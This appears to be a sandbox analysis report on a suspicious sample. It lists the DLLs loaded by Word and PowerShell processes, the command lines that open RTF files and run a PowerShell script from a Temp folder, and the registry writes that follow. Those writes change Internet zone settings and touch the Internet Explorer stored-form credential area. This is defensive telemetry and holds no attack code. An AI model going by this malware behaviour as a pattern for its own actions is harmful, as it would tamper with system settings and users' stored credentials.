c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\winspool.drv
c:\windows\system32\rsaenh.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\wldap32.dll
c:\program files\microsoft office\office14\genko.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\sxs.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\secur32.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\userenv.dll
c:\windows\system32\linkinfo.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\windows\system32\prntvpt.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\program files\common files\microsoft shared\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\vba\vba7\1033\vbe7intl.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\program files\common files\microsoft shared\proof\mslid.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\netutils.dll
c:\program files\common files\system\ado\msadox.dll
c:\program files\microsoft office\office14\gkword.dll

PID
2784
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\racehistory.rtf"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\windows\system32\oleaut32.dll
c:\windows\system32\usp10.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\windows\system32\gdi32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\apphelp.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\lpk.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\shlwapi.dll
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\imm32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\winspool.drv
c:\windows\system32\clbcatq.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\urlmon.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\sxs.dll
c:\windows\system32\secur32.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\program files\microsoft office\office14\genko.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\profapi.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\userenv.dll
c:\windows\system32\prntvpt.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\cscapi.dll
c:\program files\common files\microsoft shared\vba\vba7\vbe7.dll
c:\windows\system32\srvcli.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\windows\system32\slc.dll
c:\windows\system32\linkinfo.dll
c:\program files\common files\microsoft shared\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\ntshrui.dll
c:\program files\common files\microsoft shared\proof\mslid.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\program files\microsoft office\office14\gkword.dll
c:\windows\system32\netutils.dll
c:\windows\system32\oleacc.dll
c:\program files\common files\system\ado\msadox.dll

PID
1340
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\relevantwebsite.rtf"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\msi.dll
c:\windows\system32\ole32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\windows\system32\imm32.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\wtsapi32.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\advapi32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\gdi32.dll
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\devobj.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\bcrypt.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\version.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\winspool.drv
c:\windows\system32\rsaenh.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\program files\microsoft office\office14\genko.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\fontsub.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\wininet.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\sxs.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\profapi.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\prntvpt.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\linkinfo.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\slc.dll
c:\program files\common files\microsoft shared\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\vba\vba7\1033\vbe7intl.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\common files\microsoft shared\proof\mslid.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\program files\microsoft office\office14\gkword.dll
c:\windows\system32\oleacc.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\netutils.dll

PID
3396
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\b87bb509-d7e5-4eef-9c5e-545e6cb556f4.ps1"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\system32\kernel32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\sechost.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctf.dll
c:\windows\system32\lpk.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ole32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\system32\ntshrui.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\system32\nsi.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\system32\wshext.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\system32\msisip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wininet.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\normaliz.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.security\4c1bdc03e699ab178db76a938fce6bc1\system.security.ni.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.drawing\ce11900fa489575613dc777c7fbb0d7d\system.drawing.ni.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pae3498d9#\e8948a2d96b83812948847619fc784bc\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\sxs.dll
c:\windows\system32\windowscodecs.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\netutils.dll

Registry activity

Total events
27573
Read events
0
Write events
1774
Delete events
348

Modification events

PID
Process
Operation
Key
Name
Value
2252
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
2252
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2252
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2252
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2252
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2640
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3112
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
3112
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
3112
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
3112
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
3112
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2876
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
2876
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2876
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2876
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2876
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1292
taskmgr.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1292
taskmgr.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1292
taskmgr.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1292
taskmgr.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1292
taskmgr.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\TaskManager
Preferences
30030000E803000001000000010000004503000086000000DD0400006C0200000100000001000000000000000000000001000000000000000100000000000000000000000200000004000000090000001D000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C00000040000000210000004600000052000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000000002000000010000000300000004000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0500000000000000FFFFFFFF00000000020000000300000004000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000630060003C005A00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF000000000000010000000200000003000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0400000000000000FFFFFFFF03000000FFFFFFFF4F00000028000000500000003400000050000000000000000100000002000000030000000400000000000000FFFFFFFF43000000000000000000000001000000
1292
taskmgr.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\TaskManager
UsrColumnSettings
1C0C0000340400000000000050000000010000001D0C0000350400000000000023000000010000001E0C000036040000000000003C000000010000001F0C000039040000000000004E00000001000000200C000037040000000000004E00000001000000
1108
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E
LanguageList
en-US
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 13
[F00000000][T01D346A658A6E800][O00000000]*C:\Users\admin\Documents\customgoods.rtf
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
06A1B6A16E64712BC3E0915885DD6B2761135A5913
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000E377FC6864650743845DE18188A8E6B500000000020000000000106600000001000020000000F615E4DE4135B9CD1A4D58557AA00D0E7C959E329CDEF0A6514D681D27E556DC000000000E800000000200002000000092E1EF05E5D6A93727106056CAA15F3790CA65FB47305AC888D050503E8AA2C790000000A5F2658A228CAF57BF5F2E945B4CD5F6FCFE9C309223D0230678883C29CBA47E27D53BFAFA31F3DB94D1FE90FE96F6B5086D90B53FFFDEE162AD437DC219DE1090EE1426499FF98E80663251BA46F345DF7E83E7C5B63846AD6EE38127FFC92BBB7ADF12EC6C4548B73651A2783DB4D4D3A8F901F8F306D1571CD3760EDD65C6139F00F1E1A735D17DB6784BF559819B40000000851C4E4A128C4A1585C869A044C0BF2FD435119E54A9DFA33E7B0257DEF15C80102CBAAF49E130E9D704780CBDCC566250860ABF9087591336201A3BCBA4D779
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
1489F923C4DCA729178B3E3233458550D8DDDF2945
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000E377FC6864650743845DE18188A8E6B500000000020000000000106600000001000020000000AD5AB89869EFDE9B0D7A5050FBDF1FEECE5A03A6AEEAE63847EDE6E1C0B2D53E000000000E80000000020000200000007C27074A5BDCC99EE9723F79080E61F9BA39E76CDDE9C8CB7CA0E0151AD8F6D19000000063FC706A14BAEF559D1CB5285E924D647064857BD08E7874C6ED0020E3161B302A7183B53D74C70B549C286A8D45A4C7C2DBB23405F39F9F7B1C0F88F9A2C8EEC290FF3FD13CC04815C2635E170376B4AEF5F5DB339262F526DF9BC5D0DDE7A1B0876CB4A0440F49B5BA712E34F8764DF63DE04D4817B8DEE5A72CDC04D873785F658877EC4C72CBBC6C7BA88771C1CA40000000C4F921A34D00601584FD8263C7633733CC7F7D1A67558F31733275130FB329D3E3A2AADAF27D70FCE340597A3DFB9BB5E5329678917436A5493A79D158E7DE0B
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
EE988D95F8237696E132B13B367581B368C1A4E25C
